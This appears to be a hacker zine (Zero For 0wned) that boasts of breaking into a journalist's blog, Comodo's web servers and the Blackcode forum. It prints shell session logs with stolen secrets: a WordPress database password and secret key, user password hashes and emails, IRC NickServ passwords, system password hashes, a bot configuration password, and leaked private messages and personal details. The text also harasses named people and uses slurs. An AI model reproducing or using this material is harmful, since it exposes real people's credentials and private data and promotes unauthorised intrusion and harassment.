[16:10] SAMCAT03: bye [16:10] hackerillwill: wtf [16:10] hackerillwill: i been to youre house [16:10] hackerillwill: your*( [16:10] hackerillwill: on madera [16:11] hackerillwill: or was it oakland [16:11] hackerillwill: we went to wilby together [16:12] SAMCAT03: ok [16:14] hackerillwill: u still got the same number? [root@demon2 public_html]# cat freeillwill/shoutbox/config.php [root@demon2 public_html]# cat logger.php ",$info); $thelog = fopen($ipaddr, "a"); fputs($thelog, "$info"); fclose($thelog); ~~~~~~ 170,000 lines of spam in illwill's spools. Here is his shortlist of friends: [root@demon2 illmob]# grep -A 5 'New user' mail/illmob.org/illwill | grep -v ^$ New user registration on your blog [ill]mob: Username: Spyd3r E-mail: spyd3r@spyd3rs.net -- New user registration on your blog [ill]mob: Username: padlock E-mail: padlock.x@gmail.com -- New user registration on your blog [ill]mob: Username: SomeGuy E-mail: someguy@dodgit.com -- New user registration on your blog [ill]mob: Username: illwill E-mail: xillwillx@yahoo.com -- New user registration on your blog [ill]mob: Username: Phist E-mail: phist@pr0tected.org -- New user registration on your blog [ill]mob: Username: Lone E-mail: lonesan@gmail.com -- New user registration on your blog [ill]mob: Username: pingywon E-mail: pingywon@pingywon.com -- New user registration on your blog [ill]mob: Username: morning_wood E-mail: wood@exploitlabs.com ~~~~~~~~~ Let's finish it off with some passes [ill]will -> nickserv: identify ircp455 Spyd3r -> nickserv: IDENTIFY m0b1llSpyd3r Phist -> nickserv: identify O1945y87v coldblood -> nickserv@anonymous.services: identify coldblood867 canr -> nickserv: identify password132 gh0st -> nickserv@anonymous.services: IDENTIFY milliardo padlock -> nickserv: identify 01n00bsie79 ECB -> nickserv: identify 5919625 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 Safety on the Internet zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 To reduce our targets, we are enlisting your help to solve a problem for us. We want you, the people of the internet, to take positive steps to reduce total contemptability. We offer some comments and suggestions in no particular order: 1. Don't be a dick. Alternatively, you could try getting off IRC, closing your shitty website, and getting off the internet. Go watch some TV or something. 2. Don't try to scam money out of the internet. 3. Don't talk to Phate. Phate (ZF0wned in ZF02) sent us an IRC log of some guys dissing us. We're not sure if the point was to let us know that random noobs dislike us, or to get these people owned. All it meant to us was whether or not we should own and publish them. We didn't bite. I better shut up before I'm owned. That may have been said in full sarcasm, but do you really want to take the chance? Did any of you guys realise that Phate was actually going to email us that log? Seriously, stay away from that treacherous owntard. 4. Do not pass Go. 5. Keep it real. Stick to what you know. For an obvious example, Steven J. Murdoch (PhD student) of Light Blue Touchpaper wrote a blog entry about how Google is an expert hash-cracking machine. Someone with any real-world experience could have Googled right away, or searched for the hash in one of many sites that store them, and found it that way. Or used jtr, which would crack the password much faster than his custom Python tool. Not to mention using a real wordlist - if whatever wordlist collection you use doesn't have "Anthony" in it, then it is pretty worthless. Starting by writing a slow program to crack MD5s against a wordlist, and after futily failing in that regard going to the internet, shows that LBT has less practical experience than the most inexperienced of script kiddies (which makes sense, considering one apparently owned them). Yet instead of the stupid blog revealing this to much laughter and humilitation, the internet seemed to like the post and link it everywhere. Even Bruce Schneier was fazed by it. Way to spread ignorance around because of the respect garnered by your academic standing. Neither LBT nor Schneier were targets, it's just one simple example for you. <--- reality --------------------------------------- academia ---> 6. Nobody cares about your blog, it exists only to occupy your time and satisfy your feelings of influence on the world. The more flattering attention you seek, the more negative attention you will get with it. You should probably pack it up before someone owns your Wordpress and you have to make a post about how you got pwned and try to pass it off as meaningless, plus display your weak forensic techniques. 7. There's always someone better than you, so a little modesty is a good thing. We aren't exactly great examples here, but nobody's perfect (yet). We're working on the perfection thing, give us time. It's Operation Supermen, and in case you were dreaming, there's nothing homosexual about it, faggot. :P Somehow Thomas Ptacek found himself as the king of the security blog scene, and eventually took this a bit far by blogging a paragraph on every fresh security topic as if he was an ultimate authority. He wasn't exactly arrogant or unfair, but gobbles took offense and smacked him down. Ptacek backed off and threw his energy into Wikipedia, where he has made thousands of edits now. He's even done some good work, successfully campaigning for the deletion of a lot of bullshit "hacker" biographies like those on our Whitedust founders! He basically took his authoritative position to Wikipedia, which is ok for now because Wikipedia lacks anybody else talented to do that work. Currently it's just Myles Long of CDC using his Wikipedia administrator authority to write a lot of complementary articles on CDC members, so Ptacek is a welcome relief. (Ptacek and Matasano were not targets, just examples.) 8. Similarly to #3, do not email us with taunts or insults. Maybe it's cool if you detail your fair opinions to friends, but if you just ask us to own you, you might just get owned! Also if you run a website and you do not want to be humiliated, do not let members diss us or others. Kids like tripple generally are not worth owning, but Blackcode might be. Dig it? We likes jokes though. Jokes > taunts. We have a good one about three g00ns walking into a bar. :P 9. Do not have dynamic content on your website. You're probably not smart enough and committed enough to secure it. Most likely nobody gives a shit about it anyways. 10. Bugs Bunny is fucking timeless. zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 Robert Lemos zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 Well after Bambenek in the last issue im sure you will be delighted to know we decided we needed to own another whitehat blogger. This time it is Mr Bobby "Bologna" Lemos! Otherwise known as securityfocus' Robert Lemos! Anyway, we mainly target these guys to publish the zine on their blog, but here's a mini hax log anyway! $ ls -la /home/robertle/robertlemos.com/html/ total 272 drwxr-sr-x 8 robertle robertle 4096 Apr 25 13:56 . drwx--s--x 4 robertle robertle 4096 Mar 26 2007 .. drwxr-sr-x 2 robertle robertle 4096 Apr 16 2007 cgi-bin -rw-r--r-- 1 robertle robertle 169 May 24 2007 .htaccess drwxr-sr-x 3 robertle robertle 4096 Apr 16 2007 images -rw-r--r-- 1 robertle robertle 94 Apr 25 13:34 index.php -rw-r--r-- 1 robertle robertle 15127 Apr 25 13:34 license.txt drwxr-sr-x 2 robertle robertle 4096 Apr 16 2007 public -rw-r--r-- 1 robertle robertle 7638 Apr 25 13:34 readme.html drwxr-sr-x 7 robertle robertle 4096 Apr 25 13:36 wp-admin -rw-r--r-- 1 robertle robertle 32776 Apr 25 13:36 wp-app.php -rw-r--r-- 1 robertle robertle 129 Apr 25 13:36 wp-atom.php -rw-r--r-- 1 robertle robertle 1026 Apr 25 13:36 wp-blog-header.php -rw-r--r-- 1 robertle robertle 2919 Apr 25 13:36 wp-comments-post.php -rw-r--r-- 1 robertle robertle 153 Apr 25 13:36 wp-commentsrss2.php -rw-r--r-- 1 robertle robertle 1308 Apr 25 13:36 wp-config.php drwxr-sr-x 4 robertle robertle 4096 Apr 25 13:36 wp-content -rw-r--r-- 1 robertle robertle 851 Apr 25 13:37 wp-cron.php -rw-r--r-- 1 robertle robertle 120 Apr 25 13:37 wp-feed.php drwxr-sr-x 4 robertle robertle 4096 Apr 25 13:39 wp-includes -rw-r--r-- 1 robertle robertle 1529 Apr 25 13:39 wp-links-opml.php -rw-r--r-- 1 robertle robertle 16439 Apr 25 13:39 wp-login.php -rw-r--r-- 1 robertle robertle 6077 Apr 25 13:39 wp-mail.php -rw-r--r-- 1 robertle robertle 296 Apr 25 13:39 wp-pass.php -rw-r--r-- 1 robertle robertle 190 Apr 25 13:39 wp-rdf.php -rw-r--r-- 1 robertle robertle 251 Apr 25 13:39 wp-register.php -rw-r--r-- 1 robertle robertle 129 Apr 25 13:39 wp-rss2.php -rw-r--r-- 1 robertle robertle 127 Apr 25 13:39 wp-rss.php -rw-r--r-- 1 robertle robertle 14493 Apr 25 13:39 wp-settings.php -rw-r--r-- 1 robertle robertle 3123 Apr 25 13:39 wp-trackback.php -rw-r--r-- 1 robertle robertle 68155 Apr 25 13:39 xmlrpc.php ## # Plain old WP! ## $ cat /home/robertle/robertlemos.com/html/wp-config.php // ** MySQL settings ** // define('DB_NAME', 'robertle_wordpress'); // The name of the database define('DB_USER', 'robertle_wordpre'); // Your MySQL username define('DB_PASSWORD', 'hy78DRh2'); // ...and password define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value define('DB_CHARSET', 'utf8'); define('DB_COLLATE', ''); // Change SECRET_KEY to a unique phrase. You won't have to remember it later, // so make it long and complicated. You can visit http://api.wordpress.org/secret-key/1.0/ // to get a secret key generated for you, or just make something up. define('SECRET_KEY', '+pR=X+zOk&#&97_U0U\\[!I+F&f,ST^`faRC@2w)roiH) LNPUH 0CRXm]Wgl:~Js'); // Change this to a unique phrase. // You can have multiple installations in one database if you give each a unique prefix $table_prefix = 'wp_'; // Only numbers, letters, and underscores please! // Change this to localize WordPress. A corresponding MO file for the // chosen language must be installed to wp-content/languages. // For example, install de.mo to wp-content/languages and set WPLANG to 'de' // to enable German language support. define ('WPLANG', ''); /* That's all, stop editing! Happy blogging. */ define('ABSPATH', dirname(__FILE__).'/'); require_once(ABSPATH.'wp-settings.php'); ?> $ cat lemos-DB-users.txt.trim (1,'admin','8bc58176c2315cc6f5d078336e8550ed','administrator','feedback@robertlemos.com', (2,'michelle','55e55cba279c487e6a082a5f4f22a356','michelle','michelle@aywonline.com', (3,'ethan0l','d4f1a08e8137ab11f7e87e1c919f6de1','ethan0l','elindsey@gmail.com', (4,'severus','6aef40dc8b3fc23f18e053ea27437fcb','severus','jeff@severus.org','http://www.severus.org', (5,'n3td3v','153634f00aa78e6b7779a9ec2a576c30','n3td3v','xploitable@gmail.com', (6,'amit000usa','5af4937b9bbdf2953fba91f07f9c665e','amit000usa','amit000usa@gmail.com', (7,'Richard1038','6134040b0289338f508a83fdaa1f8f4a','richard1038','r_ohap.lemosr07346@zoemail.net', (8,'puresin','b441b1cae8102e72dc36685383d55db5','puresin','suresync@walla.com', (9,'Gavriel','d2f9212ec793c0cbc8240ae06a04eab7','gavriel','gavriel73@hotmail.com', (10,'suresync','7d422f71ddacf7e6d60c39f506088e20','suresync','suresync@gmail.com', (11,'CellDet','5824deefcb052d532111a14e7d238449','celldet','lreiber@cellphonedetectives.com', (12,'Daniel','fcd7e7fe6b365629517faa40b5ad61f8','daniel','notsofresh@netzero.net', (13,'granny6x','8e4275eb9539bd19106ef3a54090b8fa','granny6x','mikarl@starpower.net', (14,'rucdoc','830aec6cc0ee531b040e5f845a9adffb','rucdoc','rucdoc@yahoo.com', (15,'hughormond','46c7e325e3710cfc9fe99a28a468dd49','hughormond','hugh.ormond@rte.ie', (16,'ana','5d554bc5f3d2cd182cdd0952b1fb87ca','ana','ana_papaya@hotmail.com', (17,'pat_mitchell','f87f2e6355adef077158670cd2d47e29','pat_mitchell','pat_mitchell0@lycos.com', (18,'xdfsd45oi','31ba65a1961059295890f8805999b607','xdfsd45oi','johnsmithuswe@gmail.com', (19,'Nyah_Troxell','9e2a06ce3a557a679e9f0b3fe231a962','nyah_troxell','gena_allegator@inbox.ru', (20,'Bush','d437c1b6cdf0bc98b8bc2988dc6e20a0','bush','main@yandex.com', (21,'Mosterboy','818470e08c063b778442db1b6957eb19','mosterboy','Mosterboyg4321@mail.com', (22,'Aline','310d2c15caddd67c384c3fdeca903985','aline','juusttingla@yahoo.com', (23,'Jigueprurne','1c218be9cddb7ef2e00ebbb1718a1b81','jigueprurne','attaisymn@kremenchug.ws', (24,'OEIISJJEsjjz','c99776606756971538b223e0272cc900','oeiisjjesjjz','lesbiansexpics@hotpop.com', (25,'myBoxfy','56ef82f4ec32a3ceed77c7cb8cb00040','myboxfy','myboxfy@bluebottle.com', Wow, even n3td3v has an account there! Sweet, we've hit the big time. zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 Every Zine Needs a Song zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 Superhacker Paul McCartney volunteered this tribute song. I actually thought it was kinda crappy, but with all the effort going into it (he said he went back in time and wrote it for us) we just couldn't turn him down. But when he started rambling on about time warp I hung up the phone. Don't Pass Me By - A Tribute to a FED I listen for your footsteps Coming up the drive Listen for your footsteps But they don't arrive Waiting for your knock dear On my old front door I don't hear it Does it mean you don't love me any more. I hear the clock a'ticking On the mantel shelf See the hands a'moving But I'm by myself I wonder where you are tonight And why I'm by myself I don't see you Does it mean you don't love me any more. Don't pass me by don't make me cry don't make me blue 'Cause you know darling I love only you You'll never know it hurt me so How I hate to see you go Don't pass me by don't make me cry I'm sorry that I doubted you I was so unfair You were in a car crash And you lost your hair You said that you would be late About an hour or two I said that's alright I'm waiting here Just waiting to hear from you. ~~ Paul's a hoot. A real nut. Disclaimer: Opinions expressed here by Paul McCartney are not representative of the views of Zero For 0wned or any of its members. Feds can stay the fuck away. zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 Comodo zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 Comodo is founded by "security architects" who have been in the business of running ./nessus for years. Today they still run ./nessus for fun and profit but they also offer their "security solutions" world wide to over 200,000 customers in more than 100 countries, securing 500,000+ businesses and individuals! Comodo - Creating Trust Online (TM). They deploy ./security-solutions for a nominal fee so *you* can rest assured that nobody will ./h4x0r your network. They can sell you flashy banners for your site which say "COMODO HACKER PROOF; TESTED $date" and "Identity assured up to $1 mil" Comodo is kind enough to let us download their "products" for free. Even though my windows VMware crashed when I ran both "Comodo Firewall Pro" and "Comodo Anti-Malware" I am assured those programs are 100% authentic and hacker-safe, tested $date, and the best solution against evil hackers. Take the no risk HackerProof challenge today! Once you have bought a SSL certificate from comodo and installed it on your website you are assured that your site is 100% hacker proof and nobody can ./sniff it. Because Comodo offers the *best* solutions, they run their own products on their corporate website and forum. Since they're the BEST, no evil hacker can compromise their server otherwise they'd have to give refunds to over 200,000 customers in more than 100 countries, securing 500,000+ businesses and individuals! And the flashy banners which said "HackerProof" are just flashy banners right? apache@tcfweb1 /var/www $ ls -al total 0 drwxr-xr-x 8 apache root 240 Dec 3 14:21 . drwxr-xr-x 14 root root 360 Dec 21 2006 .. drwxr-xr-x 5 root root 184 Oct 22 22:12 blog.comodo.com drwxr-xr-x 5 root root 120 Aug 22 2007 forums.comodo.com drwxr-xr-x 6 apache apache 144 Dec 1 2006 localhost drwxr-xr-x 4 root root 96 Jan 29 15:34 melih.com drwxr-xr-x 2 1023 users 80 Jun 9 2007 outage drwxr-xr-x 6 root root 184 Nov 20 21:36 wiki.comodo.com apache@tcfweb1 /var/www/forums.comodo.com/htdocs $ cat Settings.php apache@tcfweb1 /var/www/wiki.comodo.com/htdocs $ cat LocalSettings.php iadnah Not sure who it is yet as I aint spoken to Mil. This site is not a target so no need to worry about that. ## # Yes tripple, because you issuing an open challenge for us to own you does not # make you or the site you mod for a target :/ idiot. ## lloth -> iadnah Could you upload it somewhere below the public_html in my account on this server? As long as we get the admin passwords, we'll be fine. Then I'll dump the new database and pass that along to you. Then let the fun commence. Razz I'm hoping that some of the people overlap other forums. ## # Oh how fun, Blackcode backdoor their own forum in a vain attempt to actually # hack! ## r0x t3h s0x -> iadnah Not saying anything to tripple Razz He has no reason to be pissed about me gaining admin. He'd only be pissed because of another tiff that had come up in IRC (you've probably seen it on the boards) Would just like to clarify that I had no malicious intentions when gaining the powaz. It just started as a probe (first script was a "hello world") and then became "can I open files with this?" and eventually "can I connect to MySQL with this?" and then fo` shits 'n' giggles I made myself admin. Didn't actually use the admin powers.. except for when I locked that thread in the tutorials forum. Aaanyway.. I'll speak to X and see where he stands. ## # Lolz, hacked by one of their own mods. Sounds like eleet 0day techniquez too. # :/ ## tripple -> iadnah 2 users of this site were arrested and computers were confiscated also. I think its best that we keep a very close eye on the forums for now as no doubt they will be getting visits from law enforcement agencies. I spoke to X about it and he seems to agree. I cant names the members mate as much as i would like to tell you but i have given my word so ill let them fill anyone in if they choose to. I seen the post about IRC also mate, that will give people something to do again. Hows shit going now anyway? ## # FUCK!!! RAIDED!!!!! ## tripple->iadnah I think him hosting the IRC could be a problem mate, I am pretty sure that would still be classed as associating with known criminals, even though neither of them have been to trial yet. Thats fucked about moving your stuff etc. I could send you about $100, it aint much but it will help. I aint really ben up t much, just trying to keep my nose clean. Saved the number in my phone so you never know, I might call one night but beware the accent ## # Tripple still didn't pay up for Iadnah's "services" ## tripple->iadnah Cool Ill call sometime in the next week or so then mate as Im working lates all this week, reconsider the offer though as I know what its like to struggle and dont let pride get in the way of this ok, we have known each other a long time now and I would hate to think that pride would get between us ## # Phone sex ## tripple->iadnah I dont really have time these days to be honest mate, I got way to much on the go right now. Got a few court cases coming up also so trying to keep focused on them rather than anythig else. ## # Tripple curb crawls hoes ## tripple->iadnah That kinda info is the exact kinda info that would net you a serious amount of cash if it fell into the right hands BUT also a serious amount of time should the law know about it mate. The fact that you have teachers addresses, SS# and I will assume their ages, is something that credit card scammers would love to have. I had a scam going in a previous job where I would sell CC details to people that could clone cards and im sure you can imagine what they did once they had the cards. If the daetails were to fall into the hands of someone like that then they would pay quite well for it, provided it was enough info, when my case went to court they estimated that I made around £135,000 by selling the details alone and that the people I sold them to made over 2 million from it, so im sure you can imagine how much these type of people would like the info provided that their is enough info there. ## # HAHAHAHA. Tripple you bellend. I hope you are in jail right now. Carding, # who'd have thought ey? The loud mouth cocky prick of Blackcode. ## tripple->iadnagh I already new those types of people mate due to the circles I mixed in before I met my ex and had a kid, you might wanna try any local drug dealer, while they wont be of direct use to them (unless they have the facilities) they quite possibly could put you in touch with someone, do use the kiddie dealers though and be very carefull exactly what information you tell them you have. ## # Boy does this guy get around, drug dealing. You bad man tripple. lulz. ## iadnah->random You should be careful about making comments like this one: jaber89 wrote on Wed, 22 August 2007 23:31 So you criticize people about posting anonymously on forums and what not. Are you not the exact thing you taunt? and if you are not afraid of saying who you are i would enjoy the following information. Your name: Your Ip Adress: Your current OS: Your Name: James Showe Your IP: OS: Windows XP SP2 or maybe Media Center Browser: Firefox You live somewhere in Texas, I'm guessing near Austin. Now, don't take this as a threat or anything. I'm really not an asshole, unlike some people online are. I'm just trying to illustrate that unless you have the skills and forethought to protect yourself you shouldn't say things like that to people who tend to take it personally. You're right about the anonymous thing from your perspective, but what tripple is referring to is a little different. He's saying that the zf0 people are being anonymous in that they won't even leave anything like a handle or screen name, so nobody really knows who they are. You have a valid point though. ## # Iadnah bullying his members! :0 ## lloth->iadnah Not sure if you saw it yet, but ZF0 3 is out. http://milw0rm.com/papers/175 That, and (which is referring to the zf0) http://blackcode.com/forum/index.php?t=msg&th=2128&s tart=0#msg_15399 Makes me think that we might be attacked next. It might be a good idea to give the security of the site a bit of a tune up, just in case. Tell me what you think. If you need help with anything, just drop me a line. ## # That Lloth kid is pretty smart, totally put 2+2 together there. So here you # are Lloth, see logs below :) ## logs $ uname -a; id OpenBSD blackcode.com 4.1 GENERIC#1435 i386 uid=1006(bc) gid=1005(bc) groups=1005(bc), 10(users), 1003(bcstaff)##sweet group $ cat /etc/master.passwd root:$2a$08$6p2m7dDwgH14KMDghscHee0iU8ZGN0kIU5qRLH1o8/EhAAEGYcowK:0:0:daemon:0: 0:Charlie &:/root:/usr/local/bin/bash daemon:*:1:1::0:0:The devil himself:/root:/sbin/nologin operator:*:2:5::0:0:System &:/operator:/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin smmsp:*:25:25::0:0:Sendmail Message Submission Program:/nonexistent:/sbin/nologin popa3d:*:26:26::0:0:POP3 Server:/var/empty:/sbin/nologin sshd:*:27:27::0:0:sshd privsep:/var/empty:/sbin/nologin _portmap:*:28:28::0:0:portmap:/var/empty:/sbin/nologin _identd:*:29:29::0:0:identd:/var/empty:/sbin/nologin _rstatd:*:30:30::0:0:rpc.rstatd:/var/empty:/sbin/nologin _rusersd:*:32:32::0:0:rpc.rusersd:/var/empty:/sbin/nologin _fingerd:*:33:33::0:0:fingerd:/var/empty:/sbin/nologin _x11:*:35:35::0:0:X Server:/var/empty:/sbin/nologin _kdc:*:59:59::0:0:Kerberos Server:/var/empty:/sbin/nologin _kadmin:*:60:60::0:0:Kerberos Admin Server:/var/empty:/sbin/nologin _spamd:*:62:62::0:0:Spam Daemon:/var/empty:/sbin/nologin uucp:*:66:1::0:0:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico www:*:67:67::0:0:HTTP Server:/var/www:/sbin/nologin _isakmpd:*:68:68::0:0:isakmpd privsep:/var/empty:/sbin/nologin named:*:70:70::0:0:BIND Name Service Daemon:/var/named:/sbin/nologin proxy:*:71:71::0:0:Proxy Services:/nonexistent:/sbin/nologin _syslogd:*:73:73::0:0:Syslog Daemon:/var/empty:/sbin/nologin _pflogd:*:74:74::0:0:pflogd privsep:/var/empty:/sbin/nologin _bgpd:*:75:75::0:0:BGP Daemon:/var/empty:/sbin/nologin _tcpdump:*:76:76::0:0:tcpdump privsep:/var/empty:/sbin/nologin _dhcp:*:77:77::0:0:DHCP programs:/var/empty:/sbin/nologin _mopd:*:78:78::0:0:MOP Daemon:/var/empty:/sbin/nologin _tftpd:*:79:79::0:0:TFTP Daemon:/var/empty:/sbin/nologin _rbootd:*:80:80::0:0:rbootd Daemon:/var/empty:/sbin/nologin _afs:*:81:81::0:0:afs Daemon:/var/empty:/sbin/nologin _ppp:*:82:82::0:0:PPP utilities:/var/empty:/sbin/nologin _ntp:*:83:83::0:0:NTP Daemon:/var/empty:/sbin/nologin _ftp:*:84:84::0:0:FTP Daemon:/var/empty:/sbin/nologin _ospfd:*:85:85::0:0:OSPF Daemon:/var/empty:/sbin/nologin _hostapd:*:86:86::0:0:HostAP Daemon:/var/empty:/sbin/nologin nobody:*:32767:32767::0:0:Unprivileged user:/nonexistent:/sbin/nologin ltnoc:$2a$06$c1ka/tKmx1lji1Qe9moM6uF0yk4nXiYd0P/3aMBzAzzbhIJlbCFCC:1000:10::0:0 ::/home/ltnoc:/bin/ksh matsuura:$2a$06$1Grd0jbadQPF.2ZlRJqRKOwPZ6AokCCo3K6JHjEO1d5ROELcKWHee:1001:10:: 0:0::/home/matsuura:/bin/ksh _vsftpd:*************:513:513:daemon:0:0:vsftpd user:/nonexistent:/sbin/nologin eweng:$2a$06$YbPgN0dREwv4eSs4lg0yVeP6MyiWT4k8Rd6uR5JXyuHmkao0Aasma:1002:1002::0 :0:eweng:/var/www/users/eweng/:/usr/local/bin/bash iadnah:$2a$06$BzzhGdq9SaGCmzW5njLf0uJ.Ewf/GoAnv6xlcE6rbvjRtiJCkQKwa:1004:1001:s taff:0:0::/home/iadnah:/usr/local/bin/bash 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Sun Apr 6 17:54 - 21:41 (03:47) iadnah ttyp3 cpe-71-79-136-31.neo.res.rr.com Sun Apr 6 16:52 - 16:59 (00:07) iadnah ttyp0 cpe-71-79-136-31.neo.res.rr.com Sun Apr 6 15:48 - 16:59 (01:10) iadnah ttyp4 cpe-71-79-136-31.neo.res.rr.com Fri Apr 4 09:02 - 11:53 (02:51) bc ttyp3 cpe-71-79-136-31.neo.res.rr.com Fri Apr 4 08:48 - 11:53 (03:05) bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Fri Apr 4 07:54 - 10:40 (02:45) bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Fri Apr 4 06:38 - 06:42 (00:04) bc ttyp7 cpe-71-79-136-31.neo.res.rr.com Thu Apr 3 22:44 - 00:59 (02:15) bc ttyp6 cpe-71-79-136-31.neo.res.rr.com Thu Apr 3 21:31 - 22:54 (01:22) bcbot ttyp0 cpe-71-79-136-31.neo.res.rr.com Thu Apr 3 21:08 - 23:19 (02:10) bc ttyp6 cpe-71-79-136-31.neo.res.rr.com Thu Apr 3 19:36 - 21:29 (01:53) bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Thu Apr 3 16:38 - 19:45 (03:07) bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Wed Apr 2 21:35 - 00:49 (03:13) bc ttyp6 cpe-71-79-136-31.neo.res.rr.com Wed Apr 2 18:11 - 21:50 (03:39) bc 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cpe-71-79-136-31.neo.res.rr.com Tue Apr 1 03:43 - 07:18 (03:34) bc ttyp0 cpe-71-79-136-31.neo.res.rr.com Tue Apr 1 01:58 - 03:51 (01:53) wtmp begins Tue Apr 1 01:38 2008 $ pwd /var/www/users/bc $ ls -la total 41388 drwxr-xr-x 11 bc bc 1024 Apr 9 18:43 . drwxr-xr-x 14 root daemon 512 Feb 26 16:40 .. -rw------- 1 bc bc 10105 Apr 18 12:54 .bash_history -rw-r--r-- 1 bc bc 616 Jan 25 19:38 .bashrc -rw-r--r-- 1 bc bc 776 Mar 2 2006 .cshrc drwxr-xr-x 2 bc bc 512 Aug 20 2007 .log -rw-r--r-- 1 bc bc 317 Mar 2 2006 .login -rw-r--r-- 1 bc bc 105 Mar 2 2006 .mailrc -rw------- 1 bc bc 16301 Apr 9 18:43 .mysql_history -rw-r--r-- 1 bc bc 616 Jan 25 19:39 .profile drwx------ 2 bc bc 512 Aug 20 2007 .ssh -rw-r--r-- 1 bc bc 1808 Mar 26 17:48 drwxr-x--- 14 bc bc 512 Jan 28 10:50 FUDforum drwxr-xr-x 2 bc bc 512 Apr 28 2007 ads drwxr-xr-x 3 bc bc 512 Apr 15 18:02 bcincludes drwxr-xr-x 2 bc bc 512 Apr 9 14:01 chat -rw-r--r-- 1 bc bc 239 Feb 11 19:40 filter.php -rw-r--r-- 1 bc bc 0 Nov 29 18:35 gparse.php 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ppost.tmpl nano post_common.tmpl nano -w ppost.tmpl nano -w ppost.tmpl grep fud_code_icons * nano post_common.tmpl nano smiley.tmpl grep GenText * grep GenText * | grep -v usrinfo nano -w ppost.tmpl grep MsgR3 * nano post_common.tmpl grep MsgR3 * nano -w ppost.tmpl cd .. cd i18n/english/ ls nano msg nano -w msg tail /var/www/logs/error_log nano -w msg cd cd public_html/ cp rules.php rules.bak.php nano rules.php nano newrules.php cd bcincludes/ ls nano main.php cd public_html/apps ls nano forum-posts.php nano ../../bcincludes/recent nano ../../bcincludes/recent.php exit $ cat .ssh/known_hosts uplinklounge.com, ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtv9mPiubjzgpgbo7TMDHeAdwPftN1qbn2Cpqwypd/pejS+Ax73C ySGkMnkaCR7fpFrL7k7Af3B+QHZu1OxxlYzcMvWSlECj7xkc5642LwjL0RMvuSS8k3zDeN93THYpUAu QfUFjsGD53UWLa8OqBgcLxWlrbJ9z7Gdan9/yyCqs= ##keep your mouths shut or uplinklounge is next $ cat sql/query.php $ cd /var/www/users/bcbot $ cat harry.conf #use ssl:// for ssl connections server = port = 6667 #space-delimited list of channels channels = #uplinklounge #blackcode db_name = hb_ng db_user = harry db_pass = jdn52gj db_host = localhost nick = hb-mk3 name = harry nickserv = jdn52gj notify_scripts = http://www.uplinklounge.com/botter.php command_queue = /var/www/users/bcbot/command_queue msg_sleep = 1 command_socket_bind = logmethod = mysql homedir = /home/bcbot $ cd /var/www/users/darkmalice $ ls -la total 36 drwxr-xr-x 6 darkmalice darkmalice 512 Jan 26 23:32 . drwxr-xr-x 14 root daemon 512 Feb 26 16:40 .. -rw------- 1 darkmalice darkmalice 245 Jan 25 20:27 .bash_history -rwx------ 1 darkmalice darkmalice 549 Jan 25 18:56 .bashrc drwx------ 2 darkmalice darkmalice 512 Jan 25 19:00 .log -rwx------ 1 darkmalice darkmalice 549 Jan 24 20:27 .profile drwxr-xr-x 2 darkmalice darkmalice 512 Jan 25 18:56 .ssh drwxr-xr-x 2 darkmalice darkmalice 512 Jan 27 00:18 C-Dev drwxr-xr-x 3 darkmalice darkmalice 512 Feb 12 04:07 public_html $ cd public_html $ cat test.php ##thats just excellent, secure and informative! $ cd /var/www/users/eweng $ ls -la total 32 drwxr-xr-x 5 eweng eweng 512 Oct 